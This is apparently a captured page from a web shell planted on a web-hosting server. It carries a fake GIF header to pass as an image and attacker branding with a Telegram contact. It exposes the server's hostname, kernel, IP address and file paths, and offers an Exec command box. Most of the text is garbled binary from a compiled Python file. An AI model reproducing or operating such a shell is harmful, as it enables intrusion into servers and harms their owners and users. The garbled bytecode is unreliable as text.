GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python33
/
lib64
/
python3.3
/
xml
/
dom
/
__pycache__
[ HOME ]
Exec
Submit
minicompat.cpython-33.pyc
� ��f c @ si d Z d d d d g Z d d l Z e f Z Gd d � d e � Z Gd d � d e � Z d d � Z d S( u� Python version compatibility support for minidom. This module contains internal implementation details and should not be imported; use xml.dom.minidom instead. u NodeListu EmptyNodeListu StringTypesu defpropertyi Nc B sk | Ee Z d Z f Z d d � Z d d � Z d d � Z e e e d d �Z d d � Z d d � Z d S( u NodeListc C s. d | k o t | � k n r* | | Sd S( Ni ( u len( u selfu index( ( u7 /opt/alt/python33/lib64/python3.3/xml/dom/minicompat.pyu item5 s "u NodeList.itemc C s t | � S( N( u len( u self( ( u7 /opt/alt/python33/lib64/python3.3/xml/dom/minicompat.pyu _get_length9 s u NodeList._get_lengthc C s t j j d � � d S( Nu. attempt to modify read-only attribute 'length'( u xmlu domu NoModificationAllowedErr( u selfu value( ( u7 /opt/alt/python33/lib64/python3.3/xml/dom/minicompat.pyu _set_length<